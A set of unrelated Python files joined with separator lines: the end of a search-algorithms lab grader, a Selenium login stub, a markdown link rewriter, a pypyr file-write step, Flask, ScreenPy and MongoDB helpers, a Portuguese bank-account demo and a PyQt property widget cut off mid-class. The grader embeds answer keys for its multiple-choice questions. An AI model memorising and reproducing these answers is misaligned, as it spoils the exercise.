testanswer = lambda val, original_val=None: val == True,
expected_val = True,
name = 'is_admissible')
make_test(type = 'FUNCTION', #TEST 64
getargs = [GRAPH_3, 'g'],
testanswer = lambda val, original_val=None: val == False,
expected_val = False,
name = 'is_admissible')
make_test(type = 'FUNCTION', #TEST 65
getargs = [GRAPH_1, 'd'],
testanswer = lambda val, original_val=None: val == True,
expected_val = True,
name = 'is_consistent')
make_test(type = 'FUNCTION', #TEST 66
getargs = [GRAPH_1, 'c'],
testanswer = lambda val, original_val=None: val == True,
expected_val = True,
name = 'is_consistent')
make_test(type = 'FUNCTION', #TEST 67
getargs = [GRAPH_2, 'G'],
testanswer = lambda val, original_val=None: val == False,
expected_val = False,
name = 'is_consistent')
make_test(type = 'FUNCTION', #TEST 68
getargs = [GRAPH_3, 'g'],
testanswer = lambda val, original_val=None: val == False,
expected_val = False,
name = 'is_consistent')
#### PART 5: Multiple Choice ###################################################
ANSWER_1_getargs = "ANSWER_1"
def ANSWER_1_testanswer(val, original_val = None): #TEST 69
if val == '':
raise NotImplementedError
return str(val) == '2'
make_test(type = 'VALUE',
getargs = ANSWER_1_getargs,
testanswer = ANSWER_1_testanswer,
expected_val = "correct value of ANSWER_1 ('1', '2', '3', or '4')",
name = ANSWER_1_getargs)
ANSWER_2_getargs = "ANSWER_2"
def ANSWER_2_testanswer(val, original_val = None): #TEST 70
if val == '':
raise NotImplementedError
return str(val) == '4'
make_test(type = 'VALUE',
getargs = ANSWER_2_getargs,
testanswer = ANSWER_2_testanswer,
expected_val = "correct value of ANSWER_2 ('1', '2', '3', or '4')",
name = ANSWER_2_getargs)
ANSWER_3_getargs = "ANSWER_3"
def ANSWER_3_testanswer(val, original_val = None): #TEST 71
if val == '':
raise NotImplementedError
return str(val) == '1'
make_test(type = 'VALUE',
getargs = ANSWER_3_getargs,
testanswer = ANSWER_3_testanswer,
expected_val = "correct value of ANSWER_3 ('1', '2', '3', or '4')",
name = ANSWER_3_getargs)
ANSWER_4_getargs = "ANSWER_4"
def ANSWER_4_testanswer(val, original_val = None): #TEST 72
if val == '':
raise NotImplementedError
return str(val) == '3'
make_test(type = 'VALUE',
getargs = ANSWER_4_getargs,
testanswer = ANSWER_4_testanswer,
expected_val = "correct value of ANSWER_4 ('1', '2', '3', or '4')",
name = ANSWER_4_getargs)
#### Optional tests ############################################################
if TEST_GENERIC_BEAM:
for arg_list in search_tests:
if arg_list[0] == 'beam':
(lambda method, graph, startNode, endNode, beam_width, answer_string :
make_test(type = 'NESTED_FUNCTION',
getargs = [search_args[method],
[graph, startNode, endNode, beam_width]],
testanswer = (lambda val, original_val=None:
val == str_to_list(answer_string)),
expected_val = str_to_list(answer_string),
name = 'generic_search')
)(*arg_list[:6])
if TEST_HEURISTICS:
def test_heuristic(heuristic_dict, should_be_admissible, should_be_consistent,
should_be_optimal_a_star):
if None in heuristic_dict['G'].values(): return False
shortest_path = ['S', 'A', 'C', 'G']
GRAPH_FOR_HEURISTICS.set_heuristic(heuristic_dict)
return (should_be_admissible == is_admissible(GRAPH_FOR_HEURISTICS, 'G')
and (should_be_consistent == None
or should_be_consistent == is_consistent(GRAPH_FOR_HEURISTICS, 'G'))
and (should_be_optimal_a_star == None
or (should_be_optimal_a_star == (a_star(GRAPH_FOR_HEURISTICS, 'S', 'G')
== shortest_path))))
make_test(type = 'VALUE',
getargs = 'heuristic_1',
testanswer = (lambda val, original_val=None:
test_heuristic(val, True, True, None)),
expected_val = 'Correct numerical values for heuristic to fit specifications',
name = 'heuristic_1')
make_test(type = 'VALUE',
getargs = 'heuristic_2',
testanswer = (lambda val, original_val=None:
test_heuristic(val, True, False, None)),
expected_val = 'Correct numerical values for heuristic to fit specifications',
name = 'heuristic_2')
make_test(type = 'VALUE',
getargs = 'heuristic_3',
testanswer = (lambda val, original_val=None:
test_heuristic(val, True, None, False)),
expected_val = 'Correct numerical values for heuristic to fit specifications',
name = 'heuristic_3')
make_test(type = 'VALUE',
getargs = 'heuristic_4',
testanswer = (lambda val, original_val=None:
test_heuristic(val, True, False, True)),
expected_val = 'Correct numerical values for heuristic to fit specifications',
name = 'heuristic_4')
|
# selenium webdriver for browser automation
import selenium
from selenium import webdriver
driver = webdriver.Chrome(r"C:/Program Files (x86)/webdrivers/chromedriver.exe")
driver.get('https://canvas.case.edu')
# Select the id box
id_box = driver.find_element_by_name('username')
# Equivalent Outcome!
id_box = driver.find_element_by_id('username')
id_box.clear()
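# The username would normally be typed here before submitting,
# e.g. id_box.send_keys('username')  # placeholder value, not a real credential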
login_button = driver.find_element_by_name('submit')
login_button.click()
|
import argparse
import os
from os.path import isdir, isfile
BASE_DIR = './tempcontent/pages/'
BASE_FSP = "https://www.fullstackpython.com/"
links = {
"(/table-of-contents.html)":
"(#table-of-contents)",
# chapter 1
"(/introduction.html)":
"(#introduction)",
"(/learning-programming.html)":
"(#learning-programming)",
"(/python-programming-language.html)":
"(#python-programming-language)",
"(/why-use-python.html)":
"(#why-use-python)",
"(/python-2-or-3.html)":
"(#python-2-or-3)",
"(/enterprise-python.html)":
"(#enterprise-python)",
"(/python-community.html)":
"(#python-community)",
"(/companies-using-python.html)":
"(#companies-using-python)",
"(/best-python-resources.html)":
"(#best-python-resources)",
"(/best-python-videos.html)":
"(#best-python-videos)",
"(/best-python-podcasts.html)":
"(#best-python-podcasts)",
# chapter 2
"(/development-environments.html)":
"(#development-environments)",
"(/text-editors-ides.html)":
"(#text-editors-ides)",
"(/vim.html)":
"(#vim)",
"(/emacs.html)":
"(#emacs)",
"(/sublime-text.html)":
"(#sublime-text)",
"(/pycharm.html)":
"(#pycharm)",
"(/jupyter-notebook.html)":
"(#jupyter-notebook)",
"(/shells.html)":
"(#shells)",
"(/bourne-again-shell-bash.html)":
"(#bourne-again-shell-bash)",
"(/zsh-shell.html)":
"(#zsh-shell)",
"(/powershell.html)":
"(#powershell)",
"(/terminal-multiplexers.html)":
"(#terminal-multiplexers)",
"(/tmux.html)":
"(#tmux)",
"(/screen.html)":
"(#screen)",
"(/environment-configuration.html)":
"(#environment-configuration)",
"(/application-dependencies.html)":
"(#application-dependencies)",
"(/virtual-environments-virtualenvs-venvs.html)":
"(#virtual-environments-virtualenvs-venvs)",
"(/localhost-tunnels.html)":
"(#localhost-tunnels)",
"(/source-control.html)":
"(#source-control)",
"(/git.html)":
"(#git)",
"(/mercurial.html)":
"(#mercurial)",
# chapter 3
"(/data.html)":
"(#data)",
"(/databases.html)":
"(#relational-databases)",
"(/postgresql.html)":
"(#postgresql)",
"(/mysql.html)":
"(#mysql)",
"(/sqlite.html)":
"(#sqlite)",
"(/object-relational-mappers-orms.html)":
"(#object-relational-mappers-orms)",
"(/sqlalchemy.html)":
"(#sqlalchemy)",
"(/peewee.html)":
"(#peewee)",
"(/django-orm.html)":
"(#django-orm)",
"(/pony-orm.html)":
"(#pony-orm)",
"(/no-sql-datastore.html)":
"(#no-sql-datastore)",
"(/redis.html)":
"(#redis)",
"(/mongodb.html)":
"(#mongodb)",
"(/apache-cassandra.html)":
"(#apache-cassandra)",
"(/neo4j.html)":
"(#neo4j)",
"(/data-analysis.html)":
"(#data-analysis)",
"(/pandas.html)":
"(#pandas)",
"(/scipy-numpy.html)":
"(#scipy-numpy)",
"(/data-visualization.html)":
"(#data-visualization)",
"(/bokeh.html)":
"(#bokeh)",
"(/d3-js.html)":
"(#d3-js)",
"(/matplotlib.html)":
"(#matplotlib)",
"(/markup-languages.html)":
"(#markup-languages)",
"(/restructuredtext.html)":
"(#restructuredtext)",
"(/markdown.html)":
"(#markdown)",
# chapter 4
"(/web-development.html)":
"(#web-development)",
"(/web-frameworks.html)":
"(#web-frameworks)",
"(/django.html)":
"(#django)",
"(/flask.html)":
"(#flask)",
"(/bottle.html)":
"(#bottle)",
"(/pyramid.html)":
"(#pyramid)",
"(/turbogears.html)":
"(#turbogears)",
"(/falcon.html)":
"(#falcon)",
"(/morepath.html)":
"(#morepath)",
"(/sanic.html)":
"(#sanic)",
"(/other-web-frameworks.html)":
"(#other-web-frameworks)",
"(/template-engines.html)":
"(#template-engines)",
"(/jinja2.html)":
"(#jinja2)",
"(/mako.html)":
"(#mako)",
"(/django-templates.html)":
"(#django-templates)",
"(/web-design.html)":
"(#web-design)",
"(/hypertext-markup-language-html.html)":
"(#hypertext-markup-language-html)",
"(/cascading-style-sheets.html)":
"(#cascading-style-sheets)",
"(/responsive-design.html)":
"(#responsive-design)",
"(/minification.html)":
"(#minification)",
"(/css-frameworks.html)":
"(#css-frameworks)",
"(/bootstrap-css.html)":
"(#bootstrap-css)",
"(/foundation-css.html)":
"(#foundation-css)",
"(/javascript.html)":
"(#javascript)",
"(/react.html)":
"(#react)",
"(/vuejs.html)":
"(#vuejs)",
"(/angular.html)":
"(#angular)",
"(/task-queues.html)":
"(#task-queues)",
"(/celery.html)":
"(#celery)",
"(/redis-queue-rq.html)":
"(#redis-queue-rq)",
"(/dramatiq.html)":
"(#dramatiq)",
"(/static-site-generator.html)":
"(#static-site-generator)",
"(/pelican.html)":
"(#pelican)",
"(/lektor.html)":
"(#lektor)",
"(/mkdocs.html)":
"(#mkdocs)",
"(/testing.html)":
"(#testing)",
"(/unit-testing.html)":
"(#unit-testing)",
"(/integration-testing.html)":
"(#integration-testing)",
"(/debugging.html)":
"(#debugging)",
"(/code-metrics.html)":
"(#code-metrics)",
"(/networking.html)":
"(#networking)",
"(/https.html)":
"(#https)",
"(/websockets.html)":
"(#websockets)",
"(/webrtc.html)":
"(#webrtc)",
"(/application-programming-interfaces.html)":
"(#application-programming-interfaces)",
"(/microservices.html)":
"(#microservices)",
"(/webhooks.html)":
"(#webhooks)",
"(/bots.html)":
"(#bots)",
"(/api-creation.html)":
"(#api-creation)",
"(/api-frameworks.html)":
"(#api-frameworks)",
"(/django-rest-framework-drf.html)":
"(#django-rest-framework-drf)",
"(/api-integration.html)":
"(#api-integration)",
"(/twilio.html)":
"(#twilio)",
"(/stripe.html)":
"(#stripe)",
"(/slack.html)":
"(#slack)",
"(/okta.html)":
"(#okta)",
"(/web-application-security.html)":
"(#web-application-security)",
"(/sql-injection.html)":
"(#sql-injection)",
"(/cross-site-request-forgery-csrf.html)":
"(#cross-site-request-forgery-csrf)",
# chapter 5
"(/deployment.html)":
"(#deployment)",
"(/hosting.html)":
"(#hosting)",
"(/servers.html)":
"(#servers)",
"(/static-content.html)":
"(#static-content)",
"(/content-delivery-networks-cdns.html)":
"(#content-delivery-networks-cdns)",
"(/virtual-private-servers-vps.html)":
"(#virtual-private-servers-vps)",
"(/linode.html)":
"(#linode)",
"(/digitalocean.html)":
"(#digitalocean)",
"(/lightsail.html)":
"(#lightsail)",
"(/platform-as-a-service.html)":
"(#platform-as-a-service)",
"(/heroku.html)":
"(#heroku)",
"(/pythonanywhere.html)":
"(#pythonanywhere)",
"(/aws-codestar.html)":
"(#aws-codestar)",
"(/operating-systems.html)":
"(#operating-systems)",
"(/ubuntu.html)":
"(#ubuntu)",
"(/macos.html)":
"(#macos)",
"(/microsoft-windows.html)":
"(#microsoft-windows)",
"(/freebsd.html)":
"(#freebsd)",
"(/web-servers.html)":
"(#web-servers)",
"(/apache-http-server.html)":
"(#apache-http-server)",
"(/nginx.html)":
"(#nginx)",
"(/caddy.html)":
"(#caddy)",
"(/wsgi-servers.html)":
"(#wsgi-servers)",
"(/green-unicorn-gunicorn.html)":
"(#green-unicorn-gunicorn)",
"(/uwsgi.html)":
"(#uwsgi)",
"(/mod-wsgi.html)":
"(#mod-wsgi)",
"(/continuous-integration.html)":
"(#continuous-integration)",
"(/jenkins.html)":
"(#jenkins)",
"(/gocd.html)":
"(#gocd)",
"(/configuration-management.html)":
"(#configuration-management)",
"(/ansible.html)":
"(#ansible)",
"(/salt.html)":
"(#salt)",
"(/containers.html)":
"(#containers)",
"(/docker.html)":
"(#docker)",
"(/kubernetes.html)":
"(#kubernetes)",
"(/serverless.html)":
"(#serverless)",
"(/aws-lambda.html)":
"(#aws-lambda)",
"(/azure-functions.html)":
"(#azure-functions)",
"(/google-cloud-functions.html)":
"(#google-cloud-functions)",
# chapter 6
"(/devops.html)":
"(#devops)",
"(/monitoring.html)":
"(#monitoring)",
"(/prometheus.html)":
"(#prometheus)",
"(/rollbar.html)":
"(#rollbar)",
"(/sentry.html)":
"(#sentry)",
"(/scout.html)":
"(#scout)",
"(/web-app-performance.html)":
"(#web-app-performance)",
"(/logging.html)":
"(#logging)",
"(/caching.html)":
"(#caching)",
"(/web-analytics.html)":
"(#web-analytics)",
# meta (chapter 7)
"(/what-full-stack-means.html)":
"(#what-full-stack-means)",
"(/about-author.html)":
"(#about-author)",
"(/change-log.html)":
"(" + BASE_FSP + "change-log.html)",
"(/future-directions.html)":
"(" + BASE_FSP + "future-directions.html)",
# code examples
"(/django-code-examples.html)":
"(" + BASE_FSP + "django-code-examples.html)",
"(/sqlalchemy-extensions-plug-ins-related-libraries.html)":
"(" + BASE_FSP + "sqlalchemy-extensions-plug-ins-related-libraries.html)",
"(/email.html)":
"(" + BASE_FSP + "email.html)",
"<a href=\"/full-stack-python-map.pdf\" style=\"border:none\"><img src=\"/img/visuals/full-stack-python-map.png\" width=\"100%\" alt=\"Full Stack Python deployments map.\" class=\"shot\"></a>":
"<img src=\"img/visuals/full-stack-python-map.png\" alt=\"Full Stack Python deployments map.\">",
"(/blog.html)":
"(" + BASE_FSP + "blog.html",
"(/blog/":
"(" + BASE_FSP + "blog/",
}
def transform(output_format='pdf'):
dirs = os.listdir(BASE_DIR)
print(os.listdir(BASE_DIR))
for d in dirs:
if isdir(BASE_DIR + d):
# modify all markdown files in directory
files = os.listdir(BASE_DIR + d)
for f in files:
if not isdir(BASE_DIR + d + '/' + f):
with open(BASE_DIR + d + '/' + f, 'r',
encoding="utf-8") as read_f:
all_lines = read_f.readlines()
with open(BASE_DIR + d + '/' + f, 'w', encoding="utf-8") as write_f:
for l in all_lines:
for k, v in links.items():
l = l.replace(k, v)
if "<div class=\"well see-also\">" in l:
write_f.write("")
else:
write_f.write(l)
print('prepared file ' + str(d) + '/' + str(f))
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument("o")
args = parser.parse_args()
if args.o == 'pdf':
transform('pdf')
elif args.o == 'epub':
transform('epub')
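# Example invocation (illustrative; the script filename is an assumption):
#   python transform_markdown.py pdf
#   python transform_markdown.py epub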
|
"""pypyr step that writes payload out to a file."""
import logging
from pathlib import Path
from pypyr.config import config
from pypyr.utils.asserts import assert_key_exists, assert_key_is_truthy
logger = logging.getLogger(__name__)
def run_step(context):
"""Write payload to file.
For list of available encodings, see:
https://docs.python.org/3/library/codecs.html#standard-encodings
Args:
context: pypyr.context.Context. Mandatory.
The following context keys expected:
- fileWrite
- path. mandatory. path-like. Write output file to
here. Will create directories in path for you.
- payload. optional. Write this value to output file.
- append. boolean. Default False. Set to True to append to
file if it exists already. If False will overwrite
existing file.
- binary. boolean. Default False. Set to True to write file
content as bytes in binary mode. Set both append & binary
True to append to binary file.
- encoding. string. Defaults to None (platform default,
usually 'utf-8').
Returns:
None.
Raises:
pypyr.errors.KeyNotInContextError: fileWrite or
fileWrite['path'] missing in context.
pypyr.errors.KeyInContextHasNoValueError: fileWrite or
fileWrite['path'] exists but is None/Empty.
"""
logger.debug("started")
context.assert_key_has_value('fileWrite', __name__)
file_write = context.get_formatted('fileWrite')
assert_key_is_truthy(obj=file_write,
key='path',
caller=__name__,
parent='fileWrite')
assert_key_exists(obj=file_write,
key='payload',
caller=__name__,
parent='fileWrite')
path = Path(file_write['path'])
is_append = file_write.get('append', False)
is_binary = file_write.get('binary', False)
encoding = file_write.get('encoding', config.default_encoding)
if is_binary:
mode = 'ab' if is_append else 'wb'
payload = file_write['payload']
else:
mode = 'a' if is_append else 'w'
# if payload is str already, str(payload) is payload (same obj id)
payload = str(file_write['payload'])
logger.debug("opening destination file for writing: %s", path)
path.parent.mkdir(parents=True, exist_ok=True)
# binary mode must not receive an encoding, so only pass it for text writes
with open(path, mode, encoding=None if is_binary else encoding) as file:
file.write(payload)
logger.info("formatted context & wrote to %s", path)
logger.debug("done")
|
from flask import Flask
def create_app():
app = Flask(__name__, template_folder='../templates', static_folder='../static')
with app.app_context():
from src.dashboard.dashboard import dashboard_bp
app.register_blueprint(dashboard_bp)
return app
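# Minimal usage sketch (assumption: a separate entry-point module, e.g. wsgi.py):
#
#   from app_factory import create_app   # module name is an assumption
#   app = create_app()
#   app.run(debug=True)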
|
"""
An action to clear text from an input. An actor must possess the ability
to BrowseTheWeb to perform this action. An actor performs this action like
so:
the_actor.attempts_to(Clear.the_text_from_the(NAME_INPUT))
"""
from selenium.common.exceptions import WebDriverException
from ..actor import Actor
from ..exceptions import DeliveryError
from ..pacing import beat
from ..target import Target
from .base_action import BaseAction
class Clear(BaseAction):
"""
Clears the text from an input field. A Clear action is expected to be
instantiated by its static |Clear.the_text_from| method. A typical
invocation might look like:
Clear.the_text_from(COMMENT_FIELD)
It can then be passed along to the |Actor| to perform the action.
"""
target: Target
@staticmethod
def the_text_from_the(target: Target) -> "Clear":
"""
Creates a new Clear action for the provided target.
Args:
target: the |Target| from which to clear the text.
Returns:
|Clear|
"""
return Clear(target)
@staticmethod
def the_text_from(target: Target) -> "Clear":
"""Syntactic sugar for |Clear.the_text_from_the|."""
return Clear.the_text_from_the(target)
@beat("{0} clears text from the {target}.")
def perform_as(self, the_actor: Actor) -> None:
"""
Asks the actor to perform the Clear action, clearing the text
from the targeted input field using their ability to browse the
web.
Args:
the_actor: The |Actor| who will perform this action.
Raises:
|UnableToPerformError|: the actor does not have the ability to
|BrowseTheWeb|.
"""
element = self.target.found_by(the_actor)
try:
element.clear()
except WebDriverException as e:
msg = (
"Encountered an issue while attempting to clear "
f"{self.target}: {e.__class__.__name__}"
)
raise DeliveryError(msg).with_traceback(e.__traceback__)
def __init__(self, target: Target) -> None:
self.target = target
|
import pymongo
import validate
import os
import sys
sys.path.insert(1, os.path.join(sys.path[0], '../'))
import config
import helpers
import datetime
from validate import validate_data
mongo_cursor = pymongo.MongoClient(config.MONGO_URL)
collection = mongo_cursor[config.MONGO_DB_NAME]
def is_visited(link: str):
# Cursor.count() was removed in newer PyMongo releases; count matching documents directly.
count = collection[config.COL_LINK_INDEX].count_documents(
{
"domain": helpers.get_domain(link),
"links": {"$in": [link]}
}
)
return count > 0
def add_link(url,category,page_type):
print(url,category,page_type)
def register_error(link):
print('Register Error',link)
def register_visit(link: str):
print('Register ',link)
domain = helpers.get_domain(link)
collection[config.COL_LINK_INDEX].update_one({"domain":domain},{"$push":{"links":link}},upsert=True)
def fill_data(news_data: dict):
if not news_data.get('date'):
news_data['date'] = str(datetime.datetime.utcnow())
if not news_data.get('domain'):
news_data['domain'] = helpers.get_domain(news_data['url'])
return news_data
def insert_news(news_data: dict):
# print(news_data)
# validate here
if validate_data(news_data):
print('Data Validated')
news_data = fill_data(news_data)
collection[config.COL_NEWS_CONTENT].insert_one(news_data)
else:
print('Invalid Data')
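# Illustrative usage sketch (assumes config, helpers and a reachable MongoDB instance):
#
#   article = {"url": "https://example.com/news/1", "title": "Example headline"}
#   insert_news(article)            # validates, fills date/domain, stores in COL_NEWS_CONTENT
#   register_visit(article["url"])  # records the link under its domain in COL_LINK_INDEX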
|
#-*- coding: latin1 -*-
import os
import time
class Conta(object):
def __init__(self, numero, saldo):
self.numero = numero
self.saldo = saldo
def getNumero(self):
return self.numero
def getSaldo(self):
return self.saldo
def setNumero(self, numero):
self.numero = numero
def setSaldo(self, saldo):
self.saldo = saldo
def extrato(self):
return self.saldo
def deposito(self, valor):
self.saldo = self.saldo + valor
def saque(self, valor):
if (self.saldo >= valor):
self.saldo = self.saldo - valor
return 1
else:
return 0
# clear the screen
def cls():
os.system('cls' if os.name == 'nt' else 'clear')
cls()
print("*** BANCO NACIONAL ***")
print("--- ABERTURA DE CONTA ---")
num = int(input("Digite o numero da conta: "))
sal = float(input("Digite o saldo inicial: "))
cont = Conta(num, sal)
print("Conta criada com sucesso!")
op=1
while (op!=0):
# clear the screen
cls()
print("*** BANCO NACIONAL ***")
print("-- Menu de opcoes ---")
print("1. Extrato")
print("2. Deposito")
print("3. Saque")
print("0. Sair")
op=int(input("Digite a opcao desejada: "))
if (op==1):
print("Saldo: R$ %.2f" % (cont.extrato()) )
elif (op==2):
dep = float(input("Digite o valor de deposito: "))
cont.deposito(dep)
elif (op==3):
saq = float(input("Digite o valor de saque: "))
if (cont.saque(saq) == 1):
print("Saque realizado com sucesso!")
else:
print("Saldo insuficiente.")
elif (op==0) :
print("Sessao encerrada")
else:
print("Opção inválida!")
# pause for 3 seconds before returning to the menu
time.sleep(3)
print("Saldo: R$ %.2f" % (cont.extrato()) )
print("Saldo: R$ %.2f" % (cont.extrato()) )
|
# $Filename$
# $Authors$
# Last Changed: $Date$ $Committer$ $Revision-Id$
#
# Copyright (c) 2003-2011, German Aerospace Center (DLR)
# All rights reserved.
#
#
#Redistribution and use in source and binary forms, with or without
#modification, are permitted provided that the following conditions are
#met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the
# distribution.
#
# * Neither the name of the German Aerospace Center nor the names of
# its contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
#THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
#LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
#A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
#OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
#SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
#LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
#DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
#THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
#(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
#OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
Implements the main part of the property widget.
"""
from PyQt4 import QtGui, QtCore
from datafinder.core.configuration.properties import constants
from datafinder.gui.user.common.widget.property.editors.factory import EditorFactory
from datafinder.gui.user.models.properties import PropertiesModel
from datafinder.gui.gen.widgets.property_widget_ui import Ui_propertyWidget
__version__ = "$Revision-Id:$"
class PropertyWidget(QtGui.QWidget, Ui_propertyWidget):
""" Implements the main part of the property widget. """
def __init__(self, parent):
""" @see: L{QWidget<PyQt4.QtGui.QWidget>} """
QtGui.QWidget.__init__(self, parent)
Ui_propertyWidget.__init__(self)
self.setupUi(self)
self._model = None
self.connect(self.addButton, QtCore.SIGNAL("clicked()"), self._addClickedSlot)
self.connect(self.editButton, QtCore.SIGNAL("clicked()"), self._editClickedSlot)
self.connect(self.clearValueButton, QtCore.SIGNAL("clicked()"), self._clearValueClickedSlot)
self.connect(self.deleteButton, QtCore.SIGNAL("clicked()"), self._deleteClickedSlot)
self.connect(self.revertButton, QtCore.SIGNAL("clicked()"), self._revertClickedSlot)
self.connect(self.refreshButton, QtCore.SIGNAL("clicked()"), self._refreshClickedSlot)
def _propertyStateChangedSlot(self):
"""
Handles changes of properties of the model and updates
the button enabled states in accordance to the selection.
"""
self._updateButtonStates()
def _updateSlot(self, index):
"""
Slot is called when data of property entry has changed.
@param index: The index of the selected index.
@type index: L{QModelIndex<PyQt4.QtCore.QModelIndex>}
"""
if index.isValid():
self.propertiesTableView.selectionModel().setCurrentIndex(index, QtGui.QItemSelectionModel.ClearAndSelect)
def _selectionChangedSlot(self, _):
"""
Slot is called when the selected property entries changed.
"""
self._updateButtonStates()
def _updateButtonStates(self):
"""
Updates the enabled state of the add, edit, clear, revert and delete buttons
in accordance to the selected properties.
"""
indexes = self.propertiesTableView.selectionModel().selectedIndexes()
self._setInitialButtonState()
if not self._model.isReadOnly and len(indexes) > 0:
canBeCleared = isDeletable = isRevertable = True
for index in indexes:
if index.isValid():
canBeCleared &= self._model.canBeCleared(index)
isDeletable &= self._model.isDeleteable(index)
isRevertable &= self._model.isRevertable(index)
# Enable / disable buttons
if len(indexes) == 1:
self.editButton.setEnabled(self._model.flags(indexes[0]) & QtCore.Qt.ItemIsEditable)
self.clearValueButton.setEnabled(canBeCleared)
self.deleteButton.setEnabled(isDeletable)
self.revertButton.setEnabled(isRevertable)
self.addButton.setEnabled(True)
def _setInitialButtonState(self):
""" Sets the initial button state. """
self.addButton.setEnabled(not self._model.isReadOnly)
self.editButton.setEnabled(False)
self.clearValueButton.setEnabled(False)
self.deleteButton.setEnabled(False)
self.revertButton.setEnabled(False)
def _addClickedSlot(self):
""" Slot is called when the add button is used. """
index = self._model.add()
self.propertiesTableView.selectionModel().setCurrentIndex(index, QtGui.QItemSelectionModel.ClearAndSelect)
self.addButton.setEnabled(False) # We have to wait until editing is finished to avoid an invalid model
self._editClickedSlot()
def _editClickedSlot(self):
""" Slot is called when the edit button is used. """
index = self.propertiesTableView.selectionModel().currentIndex()
if index.isValid():
self.propertiesTableView.edit(index)
def _clearValueClickedSlot(self):
""" Slot is called when the set empty button is used. """
selectedIndexes = self._determinePropertyRows()
for index in selectedIndexes:
if index.isValid():
self._model.clearValue(index)
def _determinePropertyRows(self):
""" Determines the indexes of the property rows selected by the user. """
selectedIndexes = list()
rows = list() # used to check for / avoid multiple entries
for index in self.propertiesTableView.selectionModel().selectedIndexes():
if not index.row() in rows:
selectedIndexes.append(index)
rows.append(index.row())
selectedIndexes.sort(cmp=lambda x, y: cmp(x.row(), y.row()), reverse=True)
return selectedIndexes
def _deleteClickedSlot(self):
""" Slot is called when the delete button is used. """
selectedIndexes = self._determinePropertyRows()
for index in selectedIndexes:
if index.isValid():
self._model.remove(index)
def _revertClickedSlot(self):
""" Slot is called when the revert button is used. """
selectedIndexes = self._determinePropertyRows()
for index in selectedIndexes:
if index.isValid():
self._model.revert(index)
def _refreshClickedSlot(self):
""" Slot is called when the refresh button is used. """
if self._model.dirty:
button = QtGui.QMessageBox.information(self, self.tr("Refresh information"),
self.tr("All changes will be lost after the update.\n Do you want to continue?"),
QtGui.QMessageBox.Yes|QtGui.QMessageBox.No,
QtGui.QMessageBox.Yes)
if button == QtGui.QMessageBox.No:
return
self._model.refresh()
self.propertiesTableView.setSortingEnabled(True)
def _setModel(self, model):
"""
Sets the model.
@param model: Model representing a set of properties.
@type model: L{PropertiesModel<datafinder.gui.user.models.properties.PropertiesModel>}
"""
self._model = model
self.propertiesTableView.setModel(model)
self._setInitialButtonState()
column, order = self._model.sortProperties
self.propertiesTableView.horizontalHeader().setSortIndicator(column, order)
self.propertiesTableView.setSortingEnabled(True)
propertyTypeNames = [constants.STRING_TYPE, constants.DATETIME_TYPE,
constants.NUMBER_TYPE, constants.BOOLEAN_TYPE, constants.LIST_TYPE]
self.propertiesTableView.setItemDelegate(_PropertyItemDelegate(propertyTypeNames, model, self))
self.connect(self._model, QtCore.SIGNAL("dataChanged(QModelIndex, QModelIndex)"), self._updateSlot)
self.connect(self.propertiesTableView.selectionModel(),
QtCore.SIGNAL("selectionChanged(QItemSelection, QItemSelection)"),
self._selectionChangedSlot)
self.connect(self._model, QtCore.SIGNAL(PropertiesModel.PROPERTY_STATE_CHANGED_SIGNAL),
self._propertyStateChangedSlot)
def _getModel(self):
""" Getter of the property model. """
return self._model
def activateRefreshButton(self):
""" Activates the refresh button. """
self.refreshButton.show()
def deactivateRefreshButton(self):
""" De-activates the refresh button. """
self.refreshButton.hide()
model = property(_getModel, _setModel)
class _PropertyItemDelegate(QtGui.QStyledItemDelegate):
"""
This item delegate has to choose the right editor for the expected property type
and has to handle the conversion of the editor input to a proper model format.
"""
def __init__(self, propertyTypes, model, parent=None):
"""
Constructor.
@param propertyTypes: Property types available for this property
@type propertyTypes: C{list} of C{unicode}
@param parent: Parent object of the delegate.
@type parent: L{QWidget<PyQt4.QtGui.QWidget>}
"""
QtGui.QStyledItemDelegate.__init__(self, parent)
self._factory = EditorFactory()
self._propertyTypes = propertyTypes
self.connect(self, QtCore.SIGNAL("closeEditor(QWidget *, QAbstractItemDelegate::EndEditHint)"), self._handleEditorClosedSlot )
self._currentEditedRow = -1
self._currentEditedColumn = -1
self._model = model
def _handleEditorClosedSlot(self, _, hint):
""" Handles the closing of editor to remove added property entries without property name. """
if hint == QtGui.QAbstractItemDelegate.RevertModelCache \
and self._currentEditedColumn == 0:
index = self._model.index(self._currentEditedRow, self._currentEditedColumn)
index.model().setData(index, QtCore.QVariant(None))
def createEditor(self, parent, _, index):
""" @see: L{createEditor<PyQt4.QtGui.QItemDelegate.createEditor>} """
self._currentEditedRow = index.row()
self._currentEditedColumn = index.column()
if index.column() == 0:
editor = QtGui.QLineEdit(parent)
editor.setValidator(_PropertyNameValidator(index.model().propertyNameValidationFunction, editor))
elif index.column() == 1:
editor = QtGui.QComboBox(parent)
editor.addItems(self._propertyTypes)
valueType = index.model().getModelData(index.row(), 1)
if valueType in self._propertyTypes:
editor.setCurrentIndex(self._propertyTypes.index(valueType))
elif index.column() == 2:
propType = index.model().getModelData(index.row(), 1)
restriction = index.model().getModelData(index.row(), 4)
pyValue = index.model().getModelData(index.row(), 2)
editor = self._factory.createEditor(parent, propType, restriction, pyValue)
return editor
def setModelData(self, editor, model, index):
""" @see: L{setModelData<PyQt4.QtGui.QItemDelegate.setModelData>} """
